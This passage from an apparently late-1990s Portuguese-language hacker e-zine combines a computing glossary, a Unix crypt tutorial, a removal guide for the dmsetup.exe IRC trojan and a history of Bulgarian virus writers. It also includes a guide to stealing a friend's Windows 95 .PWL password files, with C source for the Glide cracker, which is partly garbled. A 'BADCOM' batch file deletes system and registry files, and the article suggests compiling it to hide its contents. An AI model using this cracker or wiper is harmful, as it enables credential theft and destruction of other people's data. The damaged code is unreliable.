ARMAZENADOS NO COMPUTADOR  OU EM OUTRO MEIO MAGNÉTICO, PARA SER USADA NO CASO DE PERDA OU  DANIFICAÇÃO DA CÓPIA ORIGINAL. C CÓDIGO BINÁRIO LINGUAGEM BÁSICA QUE O COMPUTADOR ENTENDE. TODOS OS CARACTERES SÃO   REPRESENTADOS POR SEQUÊNCIAS DE 0 E 1. CIRCUITO INTEGRADO CIRCUITO ELETRÔNICO COMPOSTO INTERNAMENTE DE UM OU MAIS CHIPS OU   PASTILHAS. CRIPTOGRAFIA TÉCNICA QUE TORNA IMCOMPREENSÍVEL O SIGNIFICADO DE TEXTOS, TRANSFORMANDO-OS EM CARACTERES EMBARALHADOS E COM OUTRO SIGNIFICADO. GERALMENTE USADA PARA SE TER SEGURANÇA NA TROCA DE INFORMAÇÕES VIA MODEM, COMO SENHAS, DADOS PESSOAIS, NÚMERO DE  CARTÃO DE CRÉDITO, ETC... D DIAL-UP MÉTODO DE ACESSO A UMA REDE OU COMPUTADOR REMOTO, VIA LINHA TELEFÔNICA, DISCANDO O NÚMERO ONDE ESTÁ A REDE OU COMPUTADOR. DOT PITCH DISTÂNCIA ENTRE DOIS PONTOS DE FÓSFORO DE MESMA COR, EM UM MONITOR. QUANTO MENOR ESTA DISTÂNCIA, MAIOR SERÁ A RESOLUÇÃO E MELHOR SERÁ A IMAGEM. DOWNSIZING PROCESSO DE TRANSFERÊNCIA DAS APLICAÇÕES E DOS DADOS DE UM COMPUTADOR DE GRANDE PORTE PARA UM COMPUTADOR DE MENOR PORTE. E EMS (EXPANDED MEMORY SPECIFICATION) UMA PARTE ESPECIAL DO COMPUTADOR USADA POR ALGUNS PROGRAMAS DO DOS. F FIREWALL UM SISTEMA DE SEGURANÇA DE REDE, CUJO PRINCIPAL OBJETIVO É FILTRAR   O ACESSO, IMPEDINDO USUÁRIOS NÃO AUTORIZADOS DE BUSCAR CERTAS INFORMAÇÕES. FTP (FILE TRANSFER PROTOCOL) NOME DO PROTOCOLO UTILIZADO PARA A TRANSFERÊNCIA REMOTA DE ARQUIVOS  DE UM COMPUTADOR PARA OUTRO. FOLDER O MESMO QUE PASTA OU DIRETÓRIO. FEEDBACK O MESMO QUE REALIMENTAÇÃO, RESPOSTA OU RETORNO. FLICKER CINTILAÇÃO INDESEJÁVEL NA IMAGEM QUE APARECE NO MONITOR. OCORRE GERALMENTE QUANDO A TAXA DE REFRESH ESTÁ LENTA (EM TORNO DE 20HZ). FRACTAL TERMO MATEMÁTICO QUE DESIGNA EQUAÇÕES OU NÚMEROS CAPAZES DE DECODIFICAR O FORMATO PADRÃO DAS ESTRUTURAS EXISTENTES NA NATUREZA.   OS CÁLCULOS FRACTAIS SÃO UTILIZADOS EM COMPUTAÇÃO GRÁFICA NA  CRIAÇÃO DE AMBIENTES VIRTUAIS. H HACKER USUÁRIOS COM GRANDE CONHECIMENTO DE INFORMÁTICA, QUE CUSTUMAM SE INFILTRAR EM COMPUTADORES NOS QUAIS SEU ACESSO NÃO É AUTORIZADO. HTML (HYPERTEXT MARKUP LANGUAGE) LINGUAGEM DE PROGRAMAÇÃO UTILIZADA NA ELABORAÇÃO DE DOCUMENTOS E  PÁGINAS DA WEB. HTTP (HYPERTEXT TRANSFER PROTOCOL) PROTOCOLO UTILIZADO NA WEB PARA NORMATIZAR A MOVIMENTAÇÃO DE  INFORMAÇÕES E DOCUMENTOS PELA INTERNET. I IRQ (INTERRUPT REQUEST LINE) LINHA DE REQUISIÇÃO DE INTERRUPÇÃO. CADA DISPOSITIVO PRECISA DA  SUA PRÓPRIA IRQ. INTERFACE CONECÇÃO ENTRE DOIS DISPOSITIVOS EM UM SISTEMA DE COMPUTAÇÃO. M MSN (THE MICROSOFT NETWORK).   REDE  MICROSOFT MULTITAREFA (MULTITASK) O PROCESSO DE RODAR VÁRIOS PROGRAMAS DIFERENTES AO MESMO TEMPO. MACINTOSH COMPUTADOR DESENVOLVIDO PELA EMPRESA APPLE, DE STEVEN JOBS. MUITO   UTILIZADO EM APLICAÇÕES GRÁFICAS E VISUAIS. MEMÓRIA SECUNDÁRIA  TAMBÉM CHAMADA DE MEMÓRIA AUXILIAR. COMPLEMENTA A MEMÓRIA PRINCIPAL   DO COMPUTADOR E É CONSIDERADA UM COMPONENTE EXTERNO OU PERIFÉRICO.   OS EXEMPLOS MAIS COMUNS SÃO OS DISQUETES. MILENNIUM FREE CERTIFICADO AGORA OBRIGATÓRIO, QUE TODO SOFTWARE DEVE POSSUIR. ESTE   CERTIFICADO É A CERTEZA DE QUE TUDO IRÁ FUNCIONAR NORMALMENTE, APÓS A VIRADA DO SÉCULO. O OLE (OBJECT LINKING AND EMBEDDING) INCORPORAÇÃO E VINCULAÇÃO DE OBJETO. UMA FORMA DE MISTURAR VÁRIOS   TIPOS DE DADOS EM UM MESMO ARQUIVO. 8514/A UMA DAS MAIS CARAS E ESOTÉRICAS PLACAS DE VÍDEO, LANÇADA PELA IBM,   E AGORA COPIADA POR OUTRAS INDÚSTRIAS. P POP PROTOCOLO USADO POR CLIENTES DE CORREIO ELETRÔNICO, PARA  MANIPULAÇÃO DE ARQUIVOS DE MENSAGENS EM SERVIDORES DE CORREIO  ELETRÔNICO. POSTMASTER  E-MAIL DO RESPONSÁVEL PELO CORREIO ELETRÔNICO DE UMA MÁQUINA OU DOMÍNIO. PPP (POINT TO POINT PROTOCOL) PROTOCOLO SERIAL USADO NA COMUNICAÇÃO ENTRE DOIS COMPUTADORES VIA   MODEM E LINHA TELEFÔNICA. PROTOCOLO CONJUNTO DE REGRAS QUE DEFINEM OS PADRÕES DA TROCA DE DADOS ENTRE DOIS COMPUTADORES. POST (POWER ON SELF TEST) ROTINA DE AUTO TESTE EXECUTADA PELO COMPUTADOR QUANDO INICIADO. PERDA REDUÇÃO DO NÍVEL DO SINAL DE ENTRADA. Q QWERTY O TIPO MAIS COMUM DE TECLADO, E O MAIS USADO. O NOME DERIVA DAS SEIS PRIMEIRAS LETRAS DA FILEIRA SUPERIOR. R RNP (REDE NACIONAL DE PESQUISA) ENTIDADE LIGADA AO MINISTÉRIO DA CIÊNCIA E TECNOLOGIA E RESPONSÁVEL   PELA ORGANIZAÇÃO DA INTERNET NO BRASIL. RAM (RANDOM ACCESS MEMORY) MEMÓRIA DE ACESSO RANDÔMICO OU ALEATÓRIO. ÁREA QUE OS PROGRAMAS  UTILIZAM PARA MANIPULAR DADOS ENQUANTO RODAM. TAMBÉM CHAMADA DE  MEMÓRIA VOLÁTIL, POIS AO DESLIGARMOS O COMPUTADOR, TODO O CONTEÚDO  ARMAZENADO NESTA MEMÓRIA SE APAGA . ROM (READ ONLY MEMORY) MEMÓRIA APENAS DE LEITURA. MEMÓRIA NA QUAL GERALMENTE NÃO SE PODE  GRAVAR OU ALTERAR INFORMAÇÕES, ELAS SÓ PODEM SER LIDAS. MEMÓRIA NÃO  VOLÁTIL (BIOS). S SITE LOCAL VIRTUAL DE EMPRESAS, PESSOAS, UNIVERSIDADES E ENTIDADES QUE   FAZEM PARTE DO CIBERESPAÇO. (SIMILAR À HOME PAGE). SLIP (SERIAL LINE INTERNET PROTOCOL) OUTRO PROTOCOLO UTILIZADO NA CONECÇÃO ENTRE DOIS COMPUTADORES VIA MODEM E LINHA TELEFÔNICA. SYSOP OPERADOR DE SISTEMA. PESSOA QUE OPERA E MANTÉM UMA BBS. SPAMMERS PESSOAS QUE ENVIAM MENSAGENS NÃO SOLICITADAS ATRAVÉS DE E–MAIL. U USUÁRIO DE UM MODO GERAL É A PESSOA QUE ACESSA A ALGUM TIPO DE SERVIÇO E   USUFRUI DELE, COMO POR EXEMPLO, OS INTERNAUTAS. UNIX SISTEMA OPERACIONAL UTILIZADO PELA MAIORIA DOS COMPUTADORES DE MÉDIO E GRANDE PORTE ENCONTRADOS NA INTERNET . V VIRTUAL TERMO USADO QUANDO O COMPUTADOR SIMULA ALGO. SITUAÇÕES QUE PARECEM REAIS MAS NA VERDADE NÃO EXISTEM OU NÃO ESTÃO ACONTECENDO. VÍRUS PROGRAMAS FEITOS GERALMENTE EM LINGUAGEM DE BAIXO NÍVEL. CADA VÍRUS TEM UMA CARACTERÍSTICA OU PECULIARIDADE PRÓPRIA DE ACORDO COM O SEU CRIADOR, MAS A MAIORIA DELES COMPORTA-SE COMO UM VERDADEIRO VÍRUS BIOLÓGICO, PARECENDO ATÉ TER VIDA PRÓPRIA. O VÍRUS POSSUI UM ÚNICO OBJETIVO: DANIFICAR O COMPUTADOR. ELE SE INTRODUZ EM OUTROS PROGRAMAS, ALTERANDO SUAS INSTRUÇÕES E, COM ISSO OS DANIFICA, COMPROMETENDO TODO O SISTEMA OPERACIONAL, BANCO DE DADOS E ATÉ  OUTROS COMPUTADORES QUE ESTEJAM LIGADOS EM REDE AO COMPUTADOR INFECTADO. W WINCHESTER UNIDADE  DE  ARMAZENAMENTO  ONDE  SE  PODE  REGRAVAR OS DADOS. USADA  PARA  GUARDAR  GRANDES  QUANTIDADES  DE  INFORMAÇÃO. TAMBÉM CONHECIDA COMO H.D. OU HARD DISK (DISCO RÍGIDO). X XMS (EXTENDED MEMORY SPECIFICATION) UM TIPO DE MEMÓRIA QUE PODE SER DISTRIBUÍDA ENTRE OS PROGRAMAS DO  DOS OU DO WINDOWS. ___________________________________________________________________ / \ | Criptografia de Dados em Unix | \___________________________________________________________________/ por |SkIn| skin68@hotmail.com Na maioria dos sistemas Unix, é possível tornar os arquivos completamentes ilegíveis por pessoas NÃO AUTORIZADAS, submetendo-os ao comando crypt.(Devido a restrições do governo americano no que concerne à exportação de tecnologia de criptografia/descriptografia, nem todas as implementações de UNIX fora dos EUA suportam o comando crypt). O comando crypt usa o algoritmo de criptografia DATA ENCRIPTION Standard (DES) e quando a chave criptográfica é suficientemente complexa, é praticamente impossível descriptografar os dados criptografados dessa maneira sem o uso de caros supercomputadores dedicados à essa tarefa, como aqueles usados pelos departamentos de criptografia do Department Of Defense, U.S. Military Intelligence. O uso do Comando crypt para criptografar arquivos é bastante simples: O usuário especifica uma chave a ser mais tarde usada na descriptografia, tornando-o outra vez legível. Se a chave for esquecida ou perdida, já ERA!!! É surpreendente como um programa leva tão pouco tempo para "adivinhar" 30.000 palavras mais usadas do dicionário de inglês, suas correspondentes estrangeiras mais usadas, ou usar um gerador de número sequencial (dictmake). Se os dados criptografados forem  de natureza sensível, e houver medo de seu comprometimento, então não os mantenha em linha. Se for essencial mantê-los em linha então deve ser usadas chaves criptográficas suficientemente criptografadas. Uma chave "sofisticada" tem que ter pelo menos 8 caracteres de comprimento, e que inclua pelo menos uns 2 números e o resto de letra. Algumas rotinas de criptografia permitem que sejam usadas chaves de até 32 caracteres! Quanto maior a chave, menos provável o seu comprometimento. O comando crypt exige uma chave.Se ela não for fornecida na linha de comando, o crypt a pedirá no pronto interativo antes de executar qualquer criptografia ou descriptografia do arquivo. Ex: Criptografar: $ crypt facil_99_dificil correito.cripto Ex: descfriptografar: $ crypt facil_99_dificil < correio.cripto > correio.limpo Mais detalhes sobre isso: skin68@hotmail.com ___________________________________________________________________ / \ | Senhas no Win95 | \___________________________________________________________________/ NetRunner Mais frágil em matéria de segurança que o Win95 só mesmo o DOS... O Win95 é muito fraco nesse aspecto e como é um sistema extremamente popular (Verdade seja dita... muita gente usa Win95) temos uma janela aberta para se roubar senhas nesse sistema. Digamos que um amigo seu tem uma conta Internet e para logar no provedor ele usa a combinacao Win95+Dial-Up... Muito bem ... A primeira coisa que temos que fazer é roubar os arquivos .PWL que estão geralmente dentro do c:\windows\... como pode haver mais de um .PWL roube todos... :-). Descubra também o UserName que ele usa... uma boa maneira de descobrir isso é ver ele se conectando a Internet, ou recebendo um e-mail da nossa vítima... (geralmente o UserName para se logar é o mesmo do e-mail...). Uma vez com os arquivos, copie todos para uma pasta na sua máquina. Aí compile o programa abaixo com o C++ ... GLIDE.C ----------------------------->8--------------------------------------- #include #include #include #include #include #include unsigned char huge Data[100001]; unsigned char keystream[1001]; int Rpoint[300]; void main (int argc,char *argv[]) { FILE *fd; int i,j,k; int size; char ch; char *name; int cracked; int sizemask; int maxr; int rsz; int pos; int Rall[300]; /* recource allocation table */ if (argc<2) { printf("usage: glide filename (username)"); exit(1); } /* read PWL file */ fd=fopen(argv[1],"rb"); if(fd==NULL) { printf("can't open file %s",argv[1]); exit(1); } size=0; while(!feof(fd)) { Data[size++]=fgetc(fd); } size--; fclose(fd); /* find username */ name=argv[1]; if(argc>2) name=argv[2]; printf("Username: %s\n",name); /* copy encrypted text into keystream */ cracked=size-0x0208; if(cracked<0) cracked=0; if(cracked>1000) cracked=1000; memcpy(keystream,Data+0x208,cracked ); /* generate 20 bytes of keystream */ for(i=0;i<20;i++) { ch=toupper(name[i]); if(ch==0) break; if(ch=='.') break; keystream[i]^=ch; }; cracked=20; /* find allocated recources */ sizemask=keystream[0]+(keystream[1]<<8); printf("Sizemask: %04X\n",sizemask); for(i=0;i<256;i++) Rall[i]=0; maxr=0; for(i=0x108;i<0x208;i++) { if(Data[i]!=0xff) { Rall[Data[i]]++; if (Data[i]>maxr) maxr=Data[i]; } } maxr=(((maxr/16)+1)*16); /* recource pointer table size appears to be divisable by 16 */ /* search after recources */ Rpoint[0]=0x0208+2*maxr+20+2; /* first recource */ for(i=0;i> 8) & 0x00ff; } cracked+=maxr*2+2; printf("%d bytes of keystream recovered\n",cracked); /* decrypt resources */ for(i=0;i < maxr;i++) { rsz=Rpoint[i+1]-Rpoint[i]; if (rsz>cracked) rsz=cracked; printf("Recource[%d] (%d)\n",i,rsz); for(j=0;j Pronto... aí esta ... já temos todas as senhas que foram salvas... Se ele estiver ligado em uma rede PPP (uma NetBEUI da vida) voce também vai descobrir as senhas para as outras máquinas. Claro que para este recurso funcionar a nossa vitima tem que usar o recurso "lembrar senha". O Glide pode não conseguir descobrir a senha em alguns sistemas... Nos meus testes ele descobriu 3 senhas em 5 arquivos diferentes... Acho que na média esta bom. Eu usei como compilador o TC++ 3.0 e tudo correu normalmente. Você também pode fazer o download do glide já compilado de vários sites na Internet. Eu não me lembro quem criou o Glide... se algum leitor souber... mande que publicamos. ___________________________________________________________________ / \ | Começando do começo: As BADCOMS | \___________________________________________________________________/ Ruguer Alguns consideram as BADCOMs como pais dos vírus, não se sabe de certo quando eles surgiram ou quem inventou, mas eles começaram a ser feitos com sistemas como o MS-DOS, que aceitam arquivos de lote (.BAT), que são muito fáceis de serem feitos. Qualquer iniciante consegue fazer um arquivo .BAT, porém também é muito fácil saber o que um arquivo .BAT faz, mas existem programas específicos para se transformar BAT em executáveis (COM ou EXE) que são mais difíceis de serem decompilados. Vamos para a parte prática. Para começar, temos que escrever um arquivo .BAT, por exemplo: ====================INICIO BADCOM.BAT==================== @ECHO OFF ; Desliga o ECHO, assim ninguém ; vê os comandos que estão sendo ; dados DEL C:\AUTOEXEC.BAT ; Apaga o autoexec.bat DEL C:\CONFIG.SYS ; Apaga o config.sys DEL C:\WINDOWS\WIN.INI ; Apaga o win.ini DEL C:\WINDOWS\WIN.COM ; Apaga o win.com ATTRIB -R -S -H +A USER.DAT SYSTEM.DAT DEL USER.DAT DEL SYSTEM.DAR ; Apaga todo o registro do cara ======================FIM BADCOM.BAT====================== Pronto, porém, qualquer um, usando o EDIT ou o NOTEPAD pode bisbilhotar o que fez... ai que entra a mágica, com a ajuda de um programa, como o BAT2EXEC, você pode transformar esse seu arquivo em um arquivo .COM, que é mais difícil de se ver o código fonte... O poder destrutivo das BADCOMs é grande, basta ter criatividade !!! É bom lembrar que as BADCOMs não são vírus!!! Have Fun! ___________________________________________________________________ / \ | dmsetup.exe (cavalo de tróia) | \___________________________________________________________________/ Pinei Há algum tempo vem sendo distribuído pelas redes de IRC um arquivo de nome dmsetup.exe. Se você aceitou e executou este arquivo, você foi vítima de um "cavalo de troia". Este programa de 57566 bytes não destrói dados do seu computador mas pode apagar as suas configurações do mIRC. Além disso, cria alguns problemas para você usuário enquanto estiver batendo papo na rede. Na execução do dmsetup.exe, o programa fará o seguinte: 1. Copia a si mesmo, ou seja, copiar o arquivo executável para os diretórios c:\, c:\mIRC\, C:\Windows\ e C:\Windows\Progra~1 (ou C:\Proga~1). 2. Adiciona o comando dmsetup no fim do arquivo autoexec.bat de modo que o programa seja executado sempre que o computador for ligado ou reiniciado. 3. Cria o arquivo c:\configg.sys (5 bytes) contendo apenas uma linha, "ni!". 4. Faz um backup do arquivo original mirc.ini como backup0412.ini (ou backup04.ini). No caso do programa ser executado mais de uma vez, o mirc.ini original é perdido e esse backup0412.ini será um backup do mirc.ini criado pelo dmsetup.exe. 5. Cria um novo mirc.ini de 1473 bytes. Este arquivo carregará um arquivo de script, mircrem.ini (179 bytes). O novo mirc.ini instalado pelo dmsetup.exe vai: - sobrescrever suas configurações antigas, remover sua notify/channel lists, etc. - configurar a fonte para o padrão Fixedsys. - o campo do nick terá o valor "a", enquanto os campos UserID e nome completo terão o valor "s" (útil para encontrar usuários infectados na rede de IRC). - ao fazer a conexão, a pasta de canais vai aparecer com uma única linha "#" listada. - o DCCServer vai estar ativo para chat, send e fserve (porta 59). - o aviso de fserver será desabilitado, o diretório raíz do servidor de arquivos será c:\mIRC\. - o novo script mircrem.ini será carregado e fará o seguinte: - envia o arquivo dmsetup.exe para qualquer um que entrar no mesmo canal que você estiver. - sai do IRC (/quit) se for recebida uma mensagem com a palavra "goawaysilly" (sem aspas). - a mensagem de saída (quit message) será "tis to I who seem so sad". Removendo o arquivo manualmente (através do mIRC) ================================================= Assume-se aqui que seu mIRC esteja instalado no drive C: Antes de qualquer coisa, retire os aliases do mIRC com os comandos abaixo: /alias remove /alias unload /alias sreq Outros cavalos de tróia podem ter instalado comandos que fazem o oposto do que se deseja realmente fazer. 1. Digite //echo -s $findfile(c:\,dmsetup.exe,0) Este comando retorna quantos arquivos dmsetup.exe existem no seu computador. Chamaremos esse número de N. 2. Digite //echo -s $findfile(c:\,dmsetup.exe,#) Este comando deve ser digitado N vezes, onde o sinal # deve ser substuido por valores de 1 a N. Cada comando digitado retornará a localização de um arquivo dmsetup.exe. 3. Utilize o comando /remove ...dmsetup.exe Execute o comando para cada uma das localizações retornadas pelo passo 2. 4. Execute o passo 1 para ter certeza de que todos os arquivos foram removidos. Se for retornado o valor 0, está tudo ok. Caso o valor seja maior que 0, os passos 2 e 3 não foram executados corretamente. 5. Execute os comandos abaixo para remover o script mircrem.ini: /unload -rs mircrem.ini /remove mircrem.ini 6. Encontre o backup do arquivo mirc.ini através do comando abaixo: //echo -s $findfile(c:\mirc,backup04*.ini,1) A localização do arquivo será retornada na tela. Representaremos este valor por BACKUP. 7. Veja o tamanho deste arquivo com o comando abaixo: //echo -s $lof(BACKUP) 8. Se o valor retornado for diferente de 1473 bytes, este é o backup do mirc.ini original. Se o valor for igual a 1473, este é o script instalado pelo dmsetup.exe. a. Sendo o backup do arquivo mirc.ini original, os próximos passos ensinam a restaurá-lo. b. Caso contrário, apague este backup que nada mais é do que o arquivo criado pelo dmsetup. Apague-o e pule o passo 9. //remove BACKUP 9. Mova o arquivo para o diretório do mIRC renomeando-o para mirc.ini. //rename BACKUP $mircdir $+ mirc.ini 10. Reinicie o mIRC para que o programa reconheça as informações do mirc.ini ou crie um arquivo novo. Neste último caso, deve-se refazer as configurações. 11. Apague o arquivo configg.sys. /remove c:\configg.sys 12. Remova a linha "dmsetup" do arquivo. O comando abaixo abre o bloco de notas do Windows. /run notepad c:\autoexec.bat Depois de remover a linha, feche o editor e salve o arquivo. Controlando a distribuição do dmsetup.exe ========================================= Os usuários infectados poderão ser procurados pelo comando abaixo: /who s@* Um script de evento RAW ajuda a reconhecer os usuários infectados. Você pode copiar as linhas abaixo para a janela Tools/Remote do mIRC. raw 352:& & s & & & & & s { echo 4 -a $6 está no canal $2 e provavelmente tem o dmsetup.exe } Envie este texto ao usuário contaminado. ___________________________________________ dmsetup.exe (cavalo de tróia) 21/08/98 v1.0 pegue versões mais recentes deste texto em http://www.pinei.base.org/dm.txt Pinei : http://www.pinei.base.org Referência: http://dmsetupinfo.home.ml.org ___________________________________________________________________ / \ | Fábricas de vírus búlgaras e soviéticas | \___________________________________________________________________/ Vesselin Bontchev Diretor do Laboratório Virologia Computacional da Academia Búlgara de Ciências de Sofia, Bulgária Traduzido e adaptado por Dr Herman [ Introdução por Dr Herman ] Leitor, este é um dos melhores artigos na área de vírus. Nele você conhecerá um pouco da história dos vírus. Conhecerá também algumas das técnicas utilizadas na criação de vírus de computador. Note que este artigo data de 1987 época que ainda existia a URSS. Só para lembrar os mais novos, naquela época, o máximo de tecnologia era um 386 e Internet era coisa que só alguns universitários tinham acesso. Apesar de "velho" este artigo servirá para "abrir a mente" de muita gente. Boa leitura ! * * * 0) Introdução É conhecido de todos que a Bulgária é líder na produção de vírus de computador e que a (extinta) União Soviética segue imediatamente atrás. Este artigo tenta responder as seguintes questões: Quem cria estes vírus ? Quais vírus são feitos ? Por que são feitos ? Também mostra o impacto deste processo nos países ocidentais, assim como na indústria nacional de software. 1) Como a estória começou Há apenas 3 anos atrás não havia computadores na Bulgária. Eles foram mencionados pela primeira vez em na edição de abril da revista de informática búlgara chamada "Komputar za vas" (Computador para você) num artigo, traduzido da revista alemã "Chip". Logo após isso, a mesma revista búlgara publicou um artigo explicando porque um vírus de computador não é perigoso. Os argumentos apresentados lá, em geral, estavam corretos, mas o autor tinha se esquecido que a maioria dos usuários de PC não são programadores experientes. Alguns meses depois, no outono do mesmo ano, dois homens chegam no escritório do editor da revista dizendo que encontraram um vírus. Uma cuidadosa observação mostrou a eles que se tratava de um vírus chamado VIENNA. Naquele tempo, vírus de computador era uma idéia completamente nova para todos. Fazer um programa cuja execução imitava um ser vivo, capaz de se reproduzir e mover de um computador para outro, mesmo contra a vontade do usuário, parecia algo extremamente excitante. O fato de que "pode ser feito" e mesmo "foi feito", espalhou-se no nosso país como um incêndio. Logo, hackers conseguiram um cópia do vírus e começaram a estudá-lo. Notavelmente, o programa não tinha nada de "mágico" e o mesmo tinha sido muito mau escrito. Logo, novas melhoradas versões "feitas em casa" apareceram. Alguns deles foram produzidos apenas "recompilando" o código "disassemblado" do vírus usando um programa montador melhor (assembler). Algumas versões foram otimizadas "na unha". Como resultado, existem hoje, várias versões deste vírus, que foram criadas na Bulgária -- versões com tamanhos de 627, 623, 622, 435, 367, 353 e mesmo 348 bytes. O vírus ficara duas vezes menor (seu tamanho original era 648 bytes) sem perder nada de funcionalidade. Este vírus foi o primeiro caso. Logo após isso, fomos "infectados" pelos vírus CASCADE e PING PONG. Este último foi o primeiro vírus de boot e provou que esta área especial, presente em todos os disquetes, poderia também ser usada como meio de propagação de vírus. Todos estes três vírus provavelmente foram pegos através de cópias ilegais de programas. 2) Quem, o que e por que 2.1) O primeiro vírus búlgaro Nesta época, os vírus conhecidos infectavam apenas arquivos .COM. Isso me fez crer que a infecção do arquivos .EXE seria algo muito difícil. Infelizmente, cometi o erro de dizer isso a um amigo meu. Vamos chamá-lo de "VB" por questões de privacidade. Meu comentário foi tomado como desafio e logo após isso, recebi um vírus bem simples que infectava arquivos .EXE. Hoje é mundialmente conhecido como OLD YANKEE. O porque deste nome é que quando o vírus infecta um novo arquivo, ele toca a canção "Yankee Doodle". O vírus em si era muito simples. Sua única diferença é que ele podia infectar arquivos .EXE. O autor deste vírus distribuiu até mesmo o código fonte (para ser mais exato, o código fonte do programa que lançava o vírus). Entretanto, o vírus não se espalhou muito e nem sofreu muitas modificações. Apenas alguns locais reportaram infecções deste vírus. Provavelmente, a razão disso foi que o vírus era não- residente e que infectava arquivos apenas na unidade de disco corrente. Assim, a única possibilidade de ser infectado era copiar um arquivo infectado de um computador para outro. Quando o "problema" de se criar um vírus capaz de infectar arquivos .EXE foi resolvido, VB perdeu seu interesse no assunto e não escreveu mais nenhum vírus. Pelo o que sei, atualmente ele trabalha com processamento de sinais em real-time. 2.2) O caso TP O segundo programador de vírus búlgaro, TP, causou muito mais confusão. Quando ele ouviu pela primeira vez sobre um programa que se auto-replicava, ficou muito interessado e decidiu escrever seu próprio vírus. Ele obteve sucesso. Quando tentou implementar um esquema de proteção contra o vírus, ele obteve sucesso novamente. O próximo passo foi melhorar seu vírus para "furar" o esquema de proteção, e então, melhorar o esquema de proteção contra o vírus, e assim sucessivamente. Isso mostra porque existem mais de 50 versões diferentes de seus vírus. Infelizmente, vários deles (mais de uma dúzia) obtiveram bastante sucesso. Eles se espalharam pelo mundo inteiro. Existem relatórios sobre eles em vários países do bloco comunista, assim como dos Estados Unidos e da Europa Ocidental. As versões mais antigas destes vírus de TP são conhecidas com o nome de VACSINA, porque eles contém esta seqüência de caracteres. Na verdade, este é o nome do esquema de proteção contra vírus criado pelo autor. O esquema é implementado como um "controlador de dispositivo" ("device driver") que leva este nome. O vírus tenta abrir um arquivo com este nome, o que significa "Ei, sou eu ! Deixe- me passar." As últimas versões do vírus são mais conhecidas pelo nome de YANKEE DOODLE, porque eles tocam esta melodia. As condições nas quais a música é tocada são diferentes nas diferentes versões do vírus -- por exemplo, quando o usuário tenta dar um "boot", ou quando o relógio do sistema marca 17:00. Todos os vírus de TP são estritamente não destrutivos. Seu autor prestou bastante atenção para não destruir nenhum dado. Por exemplo, o vírus não infecta arquivos .EXE para os quais o verdadeiro tamanho do arquivo e o tamanho da parte carregável (como está presente no header), não são iguais. Pelo que sei, nenhum outro vírus que é capaz de infectar arquivos .EXE age desta maneira. Igualmente, o vírus não tenta sobrepor programas residentes que interceptam a INT 13h, mesmo correndo o risco de ser detectado pela maioria dos softwares que monitoram atividades viróticas (VShield,eg). O autor do vírus obviamente poderia evitar isso -- usuaria uma técnica inteligente, atualmente conhecida como "rastreamento de interrupção", para sobrepor todos os programas que "pegaram" a INT 21h. A única razão para não sobrepor a INT 13h é que isto poderia sobrepor todos os programas de cache de disco (SmartDrive,eg), e causar danos. É claro que o fato de um vírus não ser intencionalmente destrutivo não significa que não cause nenhum estrago. Existem vários relatórios de incompatibilidade com outros softwares; ou de usuários em pânico que formataram seus discos; ou, finalmente, danos causados pela perda de tempo ou gastos na remoção do vírus. É de senso comum que "não existe nada parecido como um bom vírus". Os vírus TP não foram espalhados intensionamente; a causa poderia ser chamada de "negligência criminosa". O computador usado por TP para desenvolver seus vírus era compartilhado como várias pessoas. Isso é uma prática comum na Bulgária, onde nem todos podem ter um computador "pessoal" para trabalhar. TP avisou os outros usuários que ele estava desenvolvendo vírus, mas como naquela época vírus de computador era uma coisa nova, ninguém levou a sério o aviso. Uma vez que TP não "limpava" a máquina antes de sair, os outros usuários, é claro, se infectavam. Sem saber o que estavam fazendo, eles espalharam os vírus. Quando indagado sobre a razão de escrever vírus, TP disse que ele fazia isso para conhecer melhor vários assuntos -- como sistema operacional e técnicas de programação. Já não tem mais interesse nesta área -- ele parou de escrever vírus há quase dois anos. 2.3) Dark Avenger Na primavera de 1989 um novo vírus apareceu na Bulgária. Era obviamente "feito-em-casa" e para tirar qualquer dúvidas sobre sua procedência, continha a seqüência dizendo "This program was written in the city of Sofia (C) 1988-89 Dark Avenger." (Este programa foi escrito na cidade de Sofia (C) 1988-89 Dark Avenger) O vírus era extremamente virulento -- como se instalva em memória, bastava copiar ou abrir um arquivo para tê-lo infectado. Quando o usuário percebia que existia um vírus no seu sistema e não tomava as devidas providências (reinicializar o sistema a partir de um disquete não infectado, protegido contra gravação, rodar um anti-vírus, etc.) ele tinha todos os seus executáveis infectados. A idéia de infectar um arquivo quando ele fosse aberto era nova e fez muito "sucesso". Hoje, este tipo de vírus são chamados de "fast infectors" (infectadores rápidos). Esta estratégia ajudou o vírus a se espalhar pelo mundo. Existem relatórios de todos os países europeus, dos Estados Unidos, da URSS, e mesmo da Tailândia e Mongólia. Além disso tudo, o vírus era perigosamente destrutivo. Na décima- sexta vez que um programa infectado era executado, o vírus sobrescrevia um setor num local randômico do disco, possivelmente destruindo um arquivo ou diretório que estava naquele setor. O setor era sobrescrito com os primeiros 512 bytes do corpo do vírus. Assim, mesmo após o sistema ter sido "vacinado", ainda havia arquivos contendo a seqüência "Eddie lives...somewhere in time!" (Eddie vive... em algum lugar no tempo !). Isto causava muito mais danos do que se o vírus apenas formatasse o winchester já que o usuário percebia a destruição. Já com este vírus, quando o usuário eventualmente o descobrisse, seus backups provavelmente já continham dados corrompidos. Logo após isso, outros vírus "inteligentes" começaram a aparecer. Quase todos eram muito destrutivos. Vários traziam idéias completamente novas. Dark Avenger é tido como autor dos seguintes vírus: DARK AVENGER, V2000 (duas variantes), V2100 (duas variantes), 651, DIAMOND (duas variantes), NOMENKLATURA, 512 (duas variantes), 800, 1226, PROUD, EVIL, PHOENIX, ANTHRAX, LEECH ... Dark Avenger foi várias vezes atacado pessoalmente por alguns "pesquisadores"*. A autoria dos vírus V2000/V2100 é atribuída a "Vesselin Bontchev" e de fato "trava" o computador quando qualquer programa, contendo esta seqüência é rodada. A versão 66 do anti-vírus VIRUSCAN de John McAffee, foi utilizada como "Cavalo de Tróia" para espalhar uma variante ligeiramente modificada do V2100 (V2100-B). Existem relatórios dizendo que Dark Avenger conectou-se a vários BBS na Europa e fez o upload destes vírus. Relatos chegaram do Reino Unido, Suécia, Países Baixos, Grécia ... Às vezes, os vírus que foram colocados nestas BBSes são desconhecidos na Bulgária (NOMECLATURA, ANTHRAX). Mas, eles foram feitos em nosso país -- eles contém mensagens em cirílico. Às vezes, Dark Avenger colocava numa BBS, um "Cavalo de Tróia" que espalhava o vírus -- não apenas um programa infectado. Isto fazia com que a detecção da fonte da infecção fosse mais difícil. Um caso particular foi quando ele fez o upload de um arquivo chamado UScan que, quando executado, entitulava-se como "um anti-vírus universal", escrito por Vesselin Bontchev. Mesmo quando fez o upload, a pessoa se logou como "Vesselin Bontchev". Na verdade, o programa infectava todos os arquivos 